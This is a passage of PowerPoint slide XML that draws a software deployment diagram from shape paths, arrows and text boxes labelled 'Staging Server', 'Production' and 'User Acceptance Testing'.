                  <a:lnTo>
                    <a:pt x="356616" y="59436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46939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6438137" y="5727953"/>
              <a:ext cx="250825" cy="287020"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="250825" h="287020">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="287020">
                  <a:moveTo>
                    <a:pt x="0" y="71628"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="71628"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="287020">
                  <a:moveTo>
                    <a:pt x="0" y="214884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="214884"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="287020">
                  <a:moveTo>
                    <a:pt x="0" y="143256"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="143256"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="287020">
                  <a:moveTo>
                    <a:pt x="0" y="286512"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="286512"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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21195" y="5913119"/>
              <a:ext cx="252983" cy="252983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6665213" y="5677661"/>
              <a:ext cx="356870" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="469900">
                  <a:moveTo>
                    <a:pt x="297179" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356615" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356615" y="59436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971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6665213" y="5677661"/>
              <a:ext cx="356870" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="297179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356615" y="59436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356615" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46939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6723125" y="5781293"/>
              <a:ext cx="250825" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250317" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="71627"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250317" y="71627"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="216407"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250317" y="216407"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="144779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250317" y="144779"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="288035"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250317" y="288035"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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06183" y="5967983"/>
              <a:ext cx="252983" cy="252983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904481" y="5714237"/>
              <a:ext cx="356870" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="469900">
                  <a:moveTo>
                    <a:pt x="297179" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="59436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971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6904481" y="5714237"/>
              <a:ext cx="356870" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="297179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="59436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46939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6962393" y="5817869"/>
              <a:ext cx="250825" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="71627"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="71627"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="216407"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="216407"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="143255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="143255"/>
                  </a:lnTo>
                </a:path>
                <a:path w="250825" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="288035"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250316" y="288035"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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45451" y="6004559"/>
              <a:ext cx="252983" cy="252983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4746498" y="5869812"/>
              <a:ext cx="4747895" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4747895" h="142875">
                  <a:moveTo>
                    <a:pt x="1358900" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1330223" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216025" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216025" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216025" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216025" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330426" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358900" y="71501"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4747895" h="142875">
                  <a:moveTo>
                    <a:pt x="4747768" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4719091" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604893" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604893" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2638044" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2638044" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604893" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4604893" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4719294" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4747768" y="71501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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9453498" y="2757931"/>
            <a:ext cx="77152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9690" marR="5080" indent="-47625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404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sta</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ng  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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1372850" y="2692145"/>
            <a:ext cx="2851785" cy="4261485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="42709B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algn="ctr" marR="88900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="51435">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Production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3747706" y="5524753"/>
            <a:ext cx="9511665" cy="1969135"/>
            <a:chOff x="3747706" y="5524753"/>
            <a:chExt cx="9511665" cy="1969135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9547097" y="5537453"/>
              <a:ext cx="594360" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594359" h="734695">
                  <a:moveTo>
                    <a:pt x="495300" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="99060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9547097" y="5537453"/>
              <a:ext cx="594360" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594359" h="734695">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495300" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73456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9643109" y="5698997"/>
              <a:ext cx="418465" cy="449580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="112775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="112775"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="336803"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="336803"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="225551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="225551"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="449579"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="449579"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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82555" y="5990843"/>
              <a:ext cx="422148" cy="394715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2599670" y="5537453"/>
              <a:ext cx="596265" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="596265" h="734695">
                  <a:moveTo>
                    <a:pt x="496570" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4965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12599670" y="5537453"/>
              <a:ext cx="596265" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="596265" h="734695">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496570" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73456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CC2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12697205" y="5698997"/>
              <a:ext cx="418465" cy="449580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="112775"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="112775"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="336803"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="336803"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="225551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="225551"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418465" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="449579"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="449579"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="5496D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35127" y="5990843"/>
              <a:ext cx="423672" cy="39471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93964" y="7028687"/>
              <a:ext cx="464820" cy="464819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5481066" y="7122540"/>
              <a:ext cx="5522595" cy="143510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="2656459" y="72263"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2513711" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513609" y="57772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="82677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513558" y="86347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513457" y="143510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2628163" y="86360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656459" y="72263"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="3195828" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3081528" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081528" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3195828" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3195828" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="3395853" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3281553" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281553" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395853" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395853" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="3595878" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3481578" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481578" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3595878" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3595878" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="3795903" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3681603" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681603" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795903" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795903" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="3995928" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3881628" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881628" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995928" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995928" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="4195953" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4081653" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4081653" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4195953" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4195953" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="4395978" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4281678" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4281678" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4395978" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4395978" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="4596003" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4481703" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4481703" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4596003" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4596003" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="4796028" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4681728" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4681728" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796028" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796028" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="4996053" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4881753" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4881753" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996053" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996053" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="5196078" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5081778" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5081778" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5196078" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5196078" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5522595" h="143509">
                  <a:moveTo>
                    <a:pt x="5522341" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5493664" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5379466" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5379466" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281803" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281803" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5379466" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5379466" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5493867" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5522341" y="71501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38927" y="7019543"/>
              <a:ext cx="341375" cy="341375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3761994" y="7190993"/>
              <a:ext cx="1377950" cy="3810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1377950" h="3809">
                  <a:moveTo>
                    <a:pt x="0" y="3809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1377568" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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2" name="object 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9022460" y="4915916"/>
            <a:ext cx="170878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86409" marR="5080" indent="-474345">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90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600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Acceptance </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-425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600" spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Testing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73" name="object 7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061192" y="7028688"/>
            <a:ext cx="464820" cy="464819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11741657" y="7122541"/>
            <a:ext cx="1306195" cy="142875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="114300" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="314325" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200025" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314325" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314325" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="514350" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400050" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514350" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514350" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="714375" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="600075" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600075" y="85724"/>
                </a:lnTo>
                <a:lnTo>
